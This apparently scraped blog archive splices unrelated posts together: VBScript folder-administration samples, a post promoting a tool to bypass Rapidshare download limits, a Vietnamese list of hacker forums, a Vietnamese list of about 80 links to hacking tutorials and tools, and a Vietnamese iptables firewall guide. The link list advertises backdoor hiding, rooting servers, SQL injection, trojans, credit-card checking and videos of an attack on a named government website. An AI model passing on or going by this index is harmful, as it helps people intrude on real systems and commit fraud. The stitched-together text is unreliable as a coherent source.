Set objShell = CreateObject("Shell.Application")
Set objFolder = objShell.NameSpace(RECYCLE_BIN)
Set objFolderItem = objFolder.Self
Set colVerbs = objFolderItem.Verbs
For i = 0 to colVerbs.Count - 1
Wscript.Echo colVerbs.Item(i)
Next

Moving a Folder

Demonstration script that uses the FileSystermObject to move a folder from one location to another. Script must be run on the local computer.

Set objFSO = CreateObject("Scripting.FileSystemObject")
objFSO.MoveFolder "C:\Scripts" , "M:\helpdesk\management"

Moving Folders Using the Shell Object

Uses the Shell object to move the folder C:\Scripts to D:\Archives. Displays the Copying Files progress dialog as the folder is being moved.

Const FOF_CREATEPROGRESSDLG = &H0&
TargetFolder = "D:\Archive"
Set objShell = CreateObject("Shell.Application")
Set objFolder = objShell.NameSpace(TargetFolder)
objFolder.MoveHere "C:\Scripts", FOF_CREATEPROGRESSDLG

Moving Folders Using WMI

Uses WMI to move the folder C:\Scripts to C:\Admins\Documents\Archive\VBScript.

strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colFolders = objWMIService.ExecQuery _
("Select * from Win32_Directory where name = 'c:\\Scripts'")
For Each objFolder in colFolders
errResults = objFolder.Rename("C:\Admins\Documents\Archive\VBScript")
Wscript.Echo errResults
Next

Renaming a Folder

Demonstration script that uses the FileSystemObject to rename a folder. Script must be run on the local computer.

Set objFSO = CreateObject("Scripting.FileSystemObject")
objFSO.MoveFolder "C:\FSO\Samples" , "C:\FSO\Scripts"

Renaming Folders

Renames the folder C:\Scripts to C:\Repository.

strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colFolders = objWMIService.ExecQuery _
("Select * from Win32_Directory where name = 'c:\\Scripts'")
For Each objFolder in colFolders
errResults = objFolder.Rename("C:\Script Repository")
Wscript.Echo errResults
Next

Retrieving Folder Properties

Lists the properties of the folder C:\Scripts.

strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colFolders = objWMIService. _
ExecQuery("Select * from Win32_Directory where name = 'c:\\Scripts'")
For Each objFolder in colFolders
Wscript.Echo "Archive: " & objFolder.Archive
Wscript.Echo "Caption: " & objFolder.Caption
Wscript.Echo "Compressed: " & objFolder.Compressed
Wscript.Echo "Compression method: " & objFolder.CompressionMethod
Wscript.Echo "Creation date: " & objFolder.CreationDate
Wscript.Echo "Encrypted: " & objFolder.Encrypted
Wscript.Echo "Encryption method: " & objFolder.EncryptionMethod
Wscript.Echo "Hidden: " & objFolder.Hidden
Wscript.Echo "In use count: " & objFolder.InUseCount
Wscript.Echo "Last accessed: " & objFolder.LastAccessed
Wscript.Echo "Last modified: " & objFolder.LastModified
Wscript.Echo "Name: " & objFolder.Name
Wscript.Echo "Path: " & objFolder.Path
Wscript.Echo "Readable: " & objFolder.Readable
Wscript.Echo "System: " & objFolder.System
Wscript.Echo "Writeable: " & objFolder.Writeable
Next

Uncompressing Folders

Uncompresses the folder C:\Scripts.

strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colFolders = objWMIService.ExecQuery _
("Select * from Win32_Directory where name = 'c:\\Scripts'")
For Each objFolder in colFolders
errResults = objFolder.Uncompress
Wscript.Echo errResults
Next

Using the Browse for Folder Dialog Box

Uses the Shell object to display the Browse for Folder dialog box. After a folder has been selected, the script reports whether or not the folder is read-only.

Const WINDOW_HANDLE = 0
Const NO_OPTIONS = 0
Set objShell = CreateObject("Shell.Application")
Set objFolder = objShell.BrowseForFolder _
(WINDOW_HANDLE, "Select a folder:", NO_OPTIONS, "C:\Scripts")
Set objFolderItem = objFolder.Self
objPath = objFolderItem.Path
objPath = Replace(objPath, "\", "\\")
strComputer = "."
Set objWMIService = GetObject _
("winmgmts:" & "!\\" & strComputer & "\root\cimv2")
Set colFiles = objWMIService.ExecQuery _
("Select * from Win32_Directory where name = '" & objPath & "'")
For Each objFile in colFiles
Wscript.Echo "Readable: " & objFile.Readable
Next

Using Recursion to Enumerate Subfolders

Demonstration script that uses the FileSystemObject to recursively list all the subfolders (and their subfolders) within a folder. Script must be run on the local computer.

Set FSO = CreateObject("Scripting.FileSystemObject")
ShowSubfolders FSO.GetFolder("C:\Scripts")
Sub ShowSubFolders(Folder)
For Each Subfolder in Folder.SubFolders
Wscript.Echo Subfolder.Path
ShowSubFolders Subfolder
Next
End Sub

Using Wildcards in a Folder Query

Returns a list of all the folders whose path begins with C:\S.

strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colFolders = objWMIService.ExecQuery _
("Select * from Win32_Directory where Name Like '%c:\\S%'")
For Each objFolder in colFolders
Wscript.Echo "Name: " & objFolder.Name
Next

Verifying that a Folder Exists

Demonstration script that uses the FileSystemObject to verify that a folder exists. If the folder does exist, the script binds to that folder. Script must be run on the local computer.

Set objFSO = CreateObject("Scripting.FileSystemObject")
If objFSO.FolderExists("C:\FSO") Then
Set objFolder = objFSO.GetFolder("C:\FSO")
Else
Wscript.Echo "Folder does not exist.”
End If

Another way to download from rapidshare

2008-09-22T00:22:00.000-07:00

url:http://shailendra88.blogspot.com/2008/02/another-way-to-download-from-rapidshare.html

Friday, February 22, 2008
Another way to download from rapidshare
Posted by Shailendra at 8:35 PM

Are you tired of downloading from rapidshare for its time limits ?Then this the perfect way to download without waiting limits.

Previously I mentioned about some scripts which will bypass the timelimit,but a software named RapidDowner is far more better than this.You have to just enter the rapidshare url and specify some proxy from the list and RapidDowner does the rest of work.This program to by pass the 110 minute waiting time limit and make it in a few minutes. Built on the .net framework and forum supported. Make rapidshare your easy free hosting service.

[Download RapidDowner]

Danh sách các forum hacker vietnam

2008-09-12T00:41:00.000-07:00

http://www.vnsecurity.com
http://www.vnmagic.org
http://ww.hvaonline.net
http://www.vnbrain.net
http://www.hcegroup.net
http://www.viethacker.org
http://www.thegioingam.biz
http://www.vietxpert.name
http://www.vhz.vn
http://www.vnres.net
http://www.hack2learn.net
http://www.viet4all.biz
http:www.vietfrauders.org
http:www.en-hack.net
http:www.viet4all.biz
http:www.beyeugroup.com
http:www.vniss

url:http://www.binhphuoc.org/diendan/showthread.php?t=3821

bộ sưu tập tổng hợp link down các video dạy hack(full version)

2008-09-12T00:37:00.000-07:00

bộ sưu tập tổng hợp link down các video dạy hack(full version)
có thể 1 số link đã die mong ae thông cảm dùm,link nào die ae kiếm cái khác fix dùm nha

1> http://warezshare.com/download.php?f...df7d54a71f7663
2> http://thanhnamhp.com.vn/cfm.rar
3> http://www.filenanny.com/files/46ecc.../Hacklocal.rar
bug local backup data
4> http://www.mediamax.com/vipundergrou...kup%20data.zip
5>hack shop cfm
http://www.mediamax.com/vipundergroup/Hosted/cfm.rar
6>down load hack
http://www.mediamax.com/vipundergrou...d/download.rar
7>bug esyndicat
http://www.mediamax.com/vipundergrou..._esyndicat.rar
8>bug ezupload
http://www.mediamax.com/vipundergrou...upload-leo.rar
9>file manager bug
http://www.mediamax.com/vipundergrou...le_Manager.rar
10>get root 1
http://www.mediamax.com/vipundergrou...d/getroot1.rar
11>get root2
http://www.mediamax.com/vipundergrou...d/getroot2.rar
12>get root3
http://www.mediamax.com/vipundergrou...d/getroot3.rar
13>Hacking vbb 3.6.6 bug XSS
http://www.mediamax.com/vipundergrou...g%20XXS%29.rar
14>hide backdoor1
http://www.mediamax.com/vipundergrou...0backdoor1.rar
15>hide backdoor2
http://www.mediamax.com/vipundergrou...0backdoor2.rar
16>how i get free host (hack host demo)
http://www.mediamax.com/vipundergrou...etfreehost.rar
17>Invision_Power_Board_2[1].1.7_Password_Change_Demonstration
http://www.mediamax.com/vipundergrou..._Power_Board_2
18>local hack1
http://www.mediamax.com/vipundergrou...al%20hack1.rar
19>local hack2
http://www.mediamax.com/vipundergrou...al%20hack2.rar
20>local hack3
http://www.mediamax.com/vipundergrou...al%20hack3.rar
21>Phim huong dan hack co ban nhat
http://www.mediamax.com/vipundergrou...dan%20hack.rar
22>phpbb
http://www.mediamax.com/vipundergroup/Hosted/phpbb.rar
23>Remote destop hack
http://www.mediamax.com/vipundergrou...Remote-vnc.rar
24>rEmOtEr_VS_Microsoft
http://www.mediamax.com/vipundergrou..._Microsoft.rar
25>SQL injection1
http://www.mediamax.com/vipundergrou...Linjection.rar
26>SQL injection2
http://www.mediamax.com/vipundergrou...injection2.rar
27>how to hack thanhhoa.gov.vn
http://www.mediamax.com/vipundergrou...d/thanhhoa.rar
28>upload hack1
http://www.mediamax.com/vipundergrou...ed/upload1.rar
29>upload hack2
http://www.mediamax.com/vipundergrou...ed/upload2.rar
30>upload hack3
http://www.mediamax.com/vipundergrou...ed/upload3.rar
31>vbb 3.5.x bug ugrade
http://www.mediamax.com/vipundergrou...g%20ugrade.rar
32>video fake ip
http://www.mediamax.com/vipundergrou...0fake%20ip.rar
windows exploit
33>http://www.mediamax.com/vipundergrou...ws-exploit.rar
34>xsst unnelling-video
http://www.mediamax.com/vipundergrou...ling-video.zip
35>Yahoo Fake [FuLL ViDEO bY HeliOs]
http://www.mediamax.com/vipundergrou...ahoo%20Fake%20[FuLL%20ViDEO%20bY%20HeliOs].rar
36>hackshop
http://www.mediamax.com/vipundergrou...d/hackshop.rar
37>video tut backconnect "Moi nguoi fale Ip thif down duoc bang link nay"
http://freewebtown.com/hackingvn/vid...backconect.rar
38>SQL Injection 4
http://www.box.net/shared/static/rsuoufbpj1.rar
or http://rapidshare.com/files/59957095/leo2.rar
39>Demo how i got root on server HPTVIETNAM
http://www.megaupload.com/?d=1KGA9NGK
40>Backdoor and JPG
http://str0ke213.tradebit.com/pub/8/57.swf
41>Crack MD5 user online and Cain
http://dl1.filmshare24h.net/md5-password-cracking.swf
42>hack computer trên mạng internet!
http://www.y0ume.net/video/hack%20computer.rar
43>409 Video hack
http://www.forcehacker.com/videos.html
44>một cách ẩn shell
http://www.y0ume.net/video/chenshell.rar
45>Một đống video hacking nhìu wá
http://137.132.19.24/security_course/vid_tutorials/
46>Windows Password Hacking (Video)
http://www.youtube.com/watch?v=vZDgR...search=laporte
47>iFrame DoS Explained
http://one.revver.com/watch/211124
48>Hack Shop CFM ,Remote PC,Check CC
http://uploadingit.com/files/197409_...S(Fix%202).zip
49>video hacking from PLD
http://rapidshare.de/files/36172349/Sec.Videos1.rar
http://rapidshare.de/files/36169967/Sec.Videos2.rar
50>video clip attack thanhhoa.gov.vn
khoai.bop.vu/thanhhoa.rar
51>TUT hack shop asp moi!!!!!!!!!!!!!!!
http://207.210.226.130/~thomaser/tool/hackasp.rar
52>upload hacking phần 2
http://thanhnamhp.com.vn/upload.rar
http://www.videos.learntohell.net/infectedgif.swf
53>VNC Remote video
http://kid1412.110mb.com/Remote-vnc.rar
http://kid1412.110mb.com/VNC.zip
54>1 kho video nữa nè
Anh em down thoải mái nha
http://aria-security.net/UPDATES/1st/Video/
http://video.hackinthebox.org/2006.html
http://chaosradio.ccc.de/22c3_m4v_563.html
http://shmoocon.org/2006/presentations.html
How Get Root Safe Mode On Server
http://www.freewebs.com/lyokha/CraVideos.rar
55> windows fun
http://warezshare.com/download.php?f...541ea58e44c56f
http://warezshare.com/download.php?f...10ddc3e346dbe2
56>Include shell trong PHP
phan 1: http://www.megaupload.com/vn/?d=9YW156EC
phan 2: http://www.megaupload.com/?d=Y8HFO9EH
57>video chào mừng 2/9
http://www.megaupload.com/?d=I92BALB5
58>==>>Windows server rooting<<==
http://www.freewebs.com/lyokha/winserverrooting.avi.flv
59>Video Local r00t Update 2007 - zer0c00l
http://rapidshare.com/files/51844339/r00t2007.rar.html
60>video dùng trojan Shark 2
http://freewebtown.com/hackingvn/videohack/sharK 2 Tutorial.rar
61>clip hack VBB với lỗi SQL injection ( mod RPG Inferno v2.4)
http://69.89.31.82/~seyiloco/leo9x/leo.rar
http://69.89.31.82/~seyiloco/leo9x/leo.txt
http://69.89.31.82/~seyiloco/leo9x/milw0rm.txt
62>Video hacking , bug upload :-D
http://www.megaupload.com/?d=S7W44YQ0
63>Chèn Backdoor vào tập tin JPG
http://str0ke213.tradebit.com/pub/8/57.swf
64>getroot
http://quangtrungschool.org/upload/getroot1.rar
65>[Video] Include Shell VBB & Hide Backdoor for newbie
http://www.box.net/public/2koz7exe6q
66>Video hack ibf
http://www.badongo.com/file/3562304
http://www.quangtrungschool.org/upload/Hack_ipf.rar
67>video download by pass!
http://66.165.236.155/~wayland/Tut.zip
68>Exploit For vBulletin_all_version
http://www.megaupload.com/?d=YK270LVU
69>Include shell với PhpBB
http://rapidshare.com/files/9742816/...shell.rar.html
http://www.4shared.com/file/8167032/...ludeshell.html
70>Video Music Thai Anh exp-do Langtuhoahao found !!!
http://orange.smartwavetech.com/~yeu...on_thaianh.rar
71>tài nguyên video
http://www.irdu.nus.edu.sg/security_...vid_tutorials/
72>Video Lesson - Inject Trojan 2 Web vs Hack Infobar Sp2
Link : http://z0mbie12.net/videoclip/exe2vbs-videohacking2.rar
73>Invision Power Board 2.1.7 (Debug) Remote Password Change Demonstration
http://rapidshare.com/files/19230640...onstration.rar
or
http://rapidshare.com/files/2155224/ipb217.swf
74>Bugs local backup data
tp://tailieumang.info/Tut.zip
75>SYN Flood
http://k49c.net/gk/SYNFlood.rar
76>Hacking Movies
http://2600.ir/pages/videoclips.htm
77>tut hack site ezupload (video)
http://www.megaupload.com/?d=GCSXUELR
78>1 site rất hay
http://www.giaiphapantoan.com/index....per&Itemid=112
79>Video Get root Linux 2.4.25
http://www.megaupload.com/?d=T9BCFRF4 or
http://www.4shared.com/file/8358713/...ot_Access.html
80>sử dụng bug eGallery trong PHP-Nuke để upshell lên server
http://milw0rm.com/video/watch.php?id=29
81>1 site security video
www.learnsecurityonline.com
http://phreaknic.wilpig.org/
http://www.hackerscenter.com/video/
http://www.illegalworld.com/
82>Video hacking phpinjection
http://video.antichat.org/download_150.html

url:http://www.binhphuoc.org/diendan/showthread.php?t=1158

Thiết lập tường lửa Iptables cho Linux

2008-09-12T00:34:00.000-07:00

Thiết lập tường lửa Iptables cho Linux
Lời mở đầu
Trong bài viết này, mình sẽ hướng dẫn cho bạn cách thiết lập tường lửa Iptables trên Linux. Bài viết gồm hai phần chính: phần I sẽ giới thiệu cơ bản về cách thức hoạt động của Iptables và phần II sẽ hướng dẫn bạn lập cấu hình Iptables cho một máy chủ phục vụ Web cụ thể
Bạn download file kèm theo tại địa chỉ IPtables

Phần I: Giới thiệu về Iptables

Iptables là một tường lửa ứng dụng lọc gói dữ liệu rất mạnh, miễn phí và có sẵn trên Linux.. Netfilter/Iptables gồm 2 phần là Netfilter ở trong nhân Linux và Iptables nằm ngoài nhân. Iptables chịu trách nhiệm giao tiếp giữa người dùng và Netfilter để đẩy các luật của người dùng vào cho Netfiler xử lí. Netfilter tiến hành lọc các gói dữ liệu ở mức IP. Netfilter làm việc trực tiếp trong nhân, nhanh và không làm giảm tốc độ của hệ thống.
Hình Kèm Theo

Cách đổi địa chỉ IP động (dynamic NAT)
Trước khi đi vào phần chính, mình cần giới thiệu với các bạn về công nghệ đổi địa chỉ NAT động và đóng giả IP Masquerade. Hai từ này được dùng rất nhiều trong Iptables nên bạn phải biết. Nếu bạn đã biết NAT động và Masquerade, bạn có thể bỏ qua phần này.

NAT động là một trong những kĩ thuật chuyển đổi địa chỉ IP NAT (Network Address Translation). Các địa chỉ IP nội bộ được chuyển sang IP NAT như sau:

NAT Router đảm nhận việc chuyển dãy IP nội bộ 169.168.0.x sang dãy IP mới 203.162.2.x. Khi có gói liệu với IP nguồn là 192.168.0.200 đến router, router sẽ đổi IP nguồn thành 203.162.2.200 sau đó mới gởi ra ngoài. Quá trình này gọi là SNAT (Source-NAT, NAT nguồn). Router lưu dữ liệu trong một bảng gọi là bảng NAT động. Ngược lại, khi có một gói từ liệu từ gởi từ ngoài vào với IP đích là 203.162.2.200, router sẽ căn cứ vào bảng NAT động hiện tại để đổi địa chỉ đích 203.162.2.200 thành địa chỉ đích mới là 192.168.0.200. Quá trình này gọi là DNAT (Destination-NAT, NAT đích). Liên lạc giữa 192.168.0.200 và 203.162.2.200 là hoàn toàn trong suốt (transparent) qua NAT router. NAT router tiến hành chuyển tiếp (forward) gói dữ liệu từ 192.168.0.200 đến 203.162.2.200 và ngược lại.
Hình Kèm Theo

Cách đóng giả địa chỉ IP (masquerade)
Đây là một kĩ thuật khác trong NAT.

NAT Router chuyển dãy IP nội bộ 192.168.0.x sang một IP duy nhất là 203.162.2.4 bằng cách dùng các số hiệu cổng (port-number) khác nhau. Chẳng hạn khi có gói dữ liệu IP với nguồn 192.168.0.168:1204, đích 211.200.51.15:80 đến router, router sẽ đổi nguồn thành 203.162.2.4:26314 và lưu dữ liệu này vào một bảng gọi là bảng masquerade động. Khi có một gói dữ liệu từ ngoài vào với nguồn là 221.200.51.15:80, đích 203.162.2.4:26314 đến router, router sẽ căn cứ vào bảng masquerade động hiện tại để đổi đích từ 203.162.2.4:26314 thành 192.168.0.164:1204. Liên lạc giữa các máy trong mạng LAN với máy khác bên ngoài hoàn toàn trong suốt qua router.
Hình Kèm Theo

Cấu trúc của Iptables
Iptables được chia làm 4 bảng (table): bảng filter dùng để lọc gói dữ liệu, bảng nat dùng để thao tác với các gói dữ liệu được NAT nguồn hay NAT đích, bảng mangle dùng để thay đổi các thông số trong gói IP và bảng conntrack dùng để theo dõi các kết nối. Mỗi table gồm nhiều mắc xích (chain). Chain gồm nhiều luật (rule) để thao tác với các gói dữ liệu. Rule có thể là ACCEPT (chấp nhận gói dữ liệu), DROP (thả gói), REJECT (loại bỏ gói) hoặc tham chiếu (reference) đến một chain khác.
--------------------------------------------------------------------------------

Quá trình chuyển gói dữ liệu qua Netfilter
Gói dữ liệu (packet) chạy trên chạy trên cáp, sau đó đi vào card mạng (chẳng hạn như eth0). Đầu tiên packet sẽ qua chain PREROUTING (trước khi định tuyến). Tại đây, packet có thể bị thay đổi thông số (mangle) hoặc bị đổi địa chỉ IP đích (DNAT). Đối với packet đi vào máy, nó sẽ qua chain INPUT. Tại chain INPUT, packet có thể được chấp nhận hoặc bị hủy bỏ. Tiếp theo packet sẽ được chuyển lên cho các ứng dụng (client/server) xử lí và tiếp theo là được chuyển ra chain OUTPUT. Tại chain OUTPUT, packet có thể bị thay đổi các thông số và bị lọc chấp nhận ra hay bị hủy bỏ. Đối với packet forward qua máy, packet sau khi rời chain PREROUTING sẽ qua chain FORWARD. Tại chain FORWARD, nó cũng bị lọc ACCEPT hoặc DENY. Packet sau khi qua chain FORWARD hoặc chain OUTPUT sẽ đến chain POSTROUTING (sau khi định tuyến). Tại chain POSTROUTING, packet có thể được đổi địa chỉ IP nguồn (SNAT) hoặc MASQUERADE. Packet sau khi ra card mạng sẽ được chuyển lên cáp để đi đến máy tính khác trên mạng.
Hình Kèm Theo

Các tham số dòng lệnh thường gặp của Iptables
1. Gọi trợ giúp

Để gọi trợ giúp về Iptables, bạn gõ lệnh $ man iptables hoặc $ iptables --help. Chẳng hạn nếu bạn cần biết về các tùy chọn của match limit, bạn gõ lệnh $ iptables -m limit --help.

2. Các tùy chọn để chỉ định thông số

- chỉ định tên table: -t , ví dụ -t filter, -t nat, .. nếu không chỉ định table, giá trị mặc định là filter

- chỉ đinh loại giao thức: -p , ví dụ -p tcp, -p udp hoặc -p ! udp để chỉ định các giao thức không phải là udp

- chỉ định card mạng vào: -i , ví dụ: -i eth0, -i lo

- chỉ định card mạng ra: -o , ví dụ: -o eth0, -o pp0

- chỉ định địa chỉ IP nguồn: -s <địa_chỉ_ip_nguồn>, ví dụ: -s 192.168.0.0/24 (mạng 192.168.0 với 24 bít mạng), -s 192.168.0.1-192.168.0.3 (các IP 192.168.0.1, 192.168.0.2, 192.168.0.3).

- chỉ định địa chỉ IP đích: -d <địa_chỉ_ip_đích>, tương tự như -s

- chỉ định cổng nguồn: --sport , ví dụ: --sport 21 (cổng 21), --sport 22:88 (các cổng 22 .. 88), --sport :80 (các cổng <=80), --sport 22: (các cổng >=22)

- chỉ định cổng đích: --dport , tương tự như --sport

3. Các tùy chọn để thao tác với chain

- tạo chain mới: iptables -N

- xóa hết các luật đã tạo trong chain: iptables -X

- đặt chính sách cho các chain `built-in` (INPUT, OUTPUT & FORWARD): iptables -P , ví dụ: iptables -P INPUT ACCEPT để chấp nhận các packet vào chain INPUT

- liệt kê các luật có trong chain: iptables -L

- xóa các luật có trong chain (flush chain): iptables -F

- reset bộ đếm packet về 0: iptables -Z

4. Các tùy chọn để thao tác với luật

- thêm luật: -A (append)

- xóa luật: -D (delete)

- thay thế luật: -R (replace)

- chèn thêm luật: -I (insert)

Mình sẽ cho ví dụ minh họa về các tùy chọn này ở phần sau.
--------------------------------------------------------------------------------

Phân biệt giữa ACCEPT, DROP và REJECT packet
- ACCEPT: chấp nhận packet

- DROP: thả packet (không hồi âm cho client)

- REJECT: loại bỏ packet (hồi âm cho client bằng một packet khác)

Ví dụ:

# iptables -A INPUT -i eth0 --dport 80 -j ACCEPT chấp nhận các packet vào cổng 80 trên card mạng eth0

# iptables -A INPUT -i eth0 -p tcp --dport 23 -j DROP thả các packet đến cổng 23 dùng giao thức TCP trên card mạng eth0

# iptables -A INPUT -i eth1 -s ! 10.0.0.1-10.0.0.5 --dport 22 -j REJECT --reject-with tcp-reset gởi gói TCP với cờ RST=1 cho các kết nối không đến từ dãy địa chỉ IP 10.0.0.1..5 trên cổng 22, card mạng eth1

# iptables -A INPUT -p udp --dport 139 -j REJECT --reject-with icmp-port-unreachable gởi gói ICMP `port-unreachable` cho các kết nối đến cổng 139, dùng giao thức UDP
--------------------------------------------------------------------------------

Phân biệt giữa NEW, ESTABLISHED và RELATED
- NEW: mở kết nối mới

- ESTABLISHED: đã thiết lập kết nối

- RELATED: mở một kết nối mới trong kết nối hiện tại

Ví dụ:
# iptables -P INPUT DROP đặt chính sách cho chain INPUT là DROP

# iptables -A INPUT -p tcp --syn -m state --state NEW -j ACCEPT chỉ chấp nhận các gói TCP mở kết nối đã set cờ SYN=1

# iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT không đóng các kết nối đang được thiết lập, đồng thời cũng cho phép mở các kết nối mới trong kết nối được thiết lập

# iptables -A INPUT -p tcp -j DROP các gói TCP còn lại đều bị DROP
--------------------------------------------------------------------------------

Tùy chọn --limit, --limit-burst
--limit-burst: mức đỉnh, tính bằng số packet

--limit: tốc độ khi chạm mức đỉnh, tính bằng số packet/s(giây), m(phút), d(giờ) hoặc h(ngày)

Mình lấy ví dụ cụ thể để bạn dễ hiểu:

# iptables -N test
# iptables -A test -m limit --limit-burst 5 --limit 2/m -j RETURN
# iptables -A test -j DROP
# iptables -A INPUT -i lo -p icmp --icmp-type echo-request -j test
Đầu tiên lệnh iptables -N test để tạo một chain mới tên là test (table mặc định là filter). Tùy chọn -A test (append) để thêm luật mới vào chain test. Đối với chain test, mình giới hạn limit-burst ở mức 5 gói, limit là 2 gói/phút, nếu thỏa luật sẽ trở về (RETURN) còn không sẽ bị DROP. Sau đó mình nối thêm chain test vào chain INPUT với tùy chọn card mạng vào là lo, giao thức icmp, loại icmp là echo-request. Luật này sẽ giới hạn các gói PING tới lo là 2 gói/phút sau khi đã đạt tới 5 gói.

Bạn thử ping đến localhost xem sao?

$ ping -c 10 localhost

Chỉ 5 gói đầu trong phút đầu tiên được chấp nhận, thỏa luật RETURN đó. Bây giờ đã đạt đến mức đỉnh là 5 gói, lập tức Iptables sẽ giới hạn PING tới lo là 2 gói trên mỗi phút bất chấp có bao nhiêu gói được PING tới lo đi nữa. Nếu trong phút tới không có gói nào PING tới, Iptables sẽ giảm limit đi 2 gói tức là tốc độ đang là 2 gói/phút sẽ tăng lên 4 gói/phút. Nếu trong phút nữa không có gói đến, limit sẽ giảm đi 2 nữa là trở về lại trạng thái cũ chưa đạt đến mức đỉnh 5 gói. Quá trình cứ tiếp tục như vậy. Bạn chỉ cần nhớ đơn giản là khi đã đạt tới mức đỉnh, tốc độ sẽ bị giới hạn bởi tham số--limit. Nếu trong một đơn vị thời gian tới không có gói đến, tốc độ sẽ tăng lên đúng bằng --limit đến khi trở lại trạng thái chưa đạt mức --limit-burst thì thôi.

Để xem các luật trong Iptables bạn gõ lệnh $ iptables -L -nv (-L tất cả các luật trong tất cả các chain, table mặc định là filter, -n liệt kê ở dạng số, v để xem chi tiết)

# iptables -L -nv
Chain INPUT (policy ACCEPT 10 packets, 840 bytes)
pkts bytes target prot opt in out source destination
10 840 test icmp -- lo * 0.0.0.0/0 0.0.0.0/0 icmp type 8

Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 15 packets, 1260 bytes)
pkts bytes target prot opt in out source destination

Chain test (1 references)
pkts bytes target prot opt in out source destination
5 420 RETURN all -- * * 0.0.0.0/0 0.0.0.0/0 limit: avg 2/min burst 5
5 420 DROP all -- * * 0.0.0.0/0 0.0.0.0/0
# iptables -Z reset counter
# iptables -F flush luật
# iptables -X xóa chain đã tạo
--------------------------------------------------------------------------------

Redirect cổng
Iptables hổ trợ tùy chọn -j REDIRECT cho phép bạn đổi hướng cổng một cách dễ dàng. Ví dụ như SQUID đang listen trên cổng 3128/tcp. Để redirect cổng 80 đến cổng 3128 này bạn làm như sau:

# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 3128
SNAT & MASQUERADE

Để tạo kết nối `transparent` giữa mạng LAN 192.168.0.1 với Internet bạn lập cấu hình cho tường lửa Iptables như sau:

# echo 1 > /proc/sys/net/ipv4/ip_forward cho phép forward các packet qua máy chủ đặt Iptables
# iptables -t nat -A POSTROUTING -o eth0 -j SNAT --to-source 210.40.2.71 đổi IP nguồn cho các packet ra card mạng eth0 là 210.40.2.71. Khi nhận được packet vào từ Internet, Iptables sẽ tự động đổi IP đích 210.40.2.71 thành IP đích tương ứng của máy tính trong mạng LAN 192.168.0/24.

Hoặc bạn có thể dùng MASQUERADE thay cho SNAT như sau:

# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

(MASQUERADE thường được dùng khi kết nối đến Internet là pp0 và dùng địa chỉ IP động)
Hình Kèm Theo

Giả sử bạn đặt các máy chủ Proxy, Mail và DNS trong mạng DMZ. Để tạo kết nối trong suốt từ Internet vào các máy chủ này bạn là như sau:

# echo 1 > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j DNAT --to-destination 192.168.1.2
# iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 25 -j DNAT --to-destination 192.168.1.3
# iptables -t nat -A PREROUTING -i eth0 -p udp --dport 53 -j DNAT --to-destination 192.168.1.4
--------------------------------------------------------------------------------
Hình Kèm Theo

(sưu tập và chỉnh sửa )
Phần II: Lập cấu hình Iptables cho máy chủ phục vụ Web
--------------------------------------------------------------------------------

Phần này mình sẽ trình bày qua ví dụ cụ thể và chỉ hướng dẫn các bạn lọc packet vào. Các packet `forward` và 'output' bạn tự làm nha.

Giả sử như máy chủ phục vụ Web kết nối mạng trực tiếp vào Internet qua card mạng eth0, địa chỉ IP là 1.2.3.4. Bạn cần lập cấu hình tường lửa cho Iptables đáp ứng các yêu cầu sau:
- cổng TCP 80 (chạy apache) mở cho mọi người truy cập web
- cổng 21 (chạy proftpd) chỉ mở cho webmaster (dùng để upload file lên public_html)
- cổng 22 (chạy openssh) chỉ mở cho admin (cung cấp shell `root` cho admin để nâng cấp & patch lỗi cho server khi cần)
- cổng UDP 53 (chạy tinydns) để phục vụ tên miền (đây chỉ là ví dụ)
- chỉ chấp nhận ICMP PING tới với code=0x08, các loại packet còn lại đều bị từ chối.
--------------------------------------------------------------------------------

Bước 1: thiết lập các tham số cho nhân
echo 1 > /proc/sys/net/ipv4/tcp_syncookies
echo 10 > /proc/sys/net/ipv4/tcp_fin_timeout
echo 1800 > /proc/sys/net/ipv4/tcp_keepalive_time
echo 0 > /proc/sys/net/ipv4/tcp_window_scaling
echo 0 > /proc/sys/net/ipv4/tcp_sack
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts
echo 0 > /proc/sys/net/ipv4/conf/eth0/accept_source_route

tcp_syncookies=1 bật chức năng chống DoS SYN qua syncookie của Linux
tcp_fin_timeout=10 đặt thời gian timeout cho quá trình đóng kết nối TCP là 10 giây
tcp_keepalive_time=1800 đặt thời gian giữ kết nối TCP là 1800 giây
...

Các tham số khác bạn có thể xem chi tiết trong tài liệu đi kèm của nhân Linux.
--------------------------------------------------------------------------------

Bước 2: nạp các môđun cần thiết cho Iptables
Để sử dụng Iptables, bạn cần phải nạp trước các môđun cần thiết. Ví dụ nếu bạn muốn dùng chức năng LOG trong Iptables, bạn phải nạp môđun ipt_LOG vào trước bằng lệnh # modprobe ipt_LOG.

MODULES="ip_tables iptable_filter ipt_LOG ipt_limit ipt_REJECT ipt_state
for i in $MODULES; do
/sbin/modprobe $MODULES
done
--------------------------------------------------------------------------------

Bước 3: nguyên tắc đặt luật là "drop trước, accept sau"
Đây là nguyên tắc mà bạn nên tuân theo. Đầu tiên hãy đóng hết các cổng, sau đó mở dần cách cổng cần thiết. Cách này tránh cho bạn gặp sai sót trong khi đặt luật cho Iptables.

iptables -P INPUT DROP thả packet trước

iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT giữ các kết nối hiện tại và chấp nhận các kết nối có liên quan

iptables -A INPUT -i lo -s 127.0.0.1 -j ACCEPT chấp nhận các gói vào looback từ IP 127.0.0.1
iptables -A INPUT -i lo -s 1.2.3.4 -j ACCEPT và 1.2.3.4

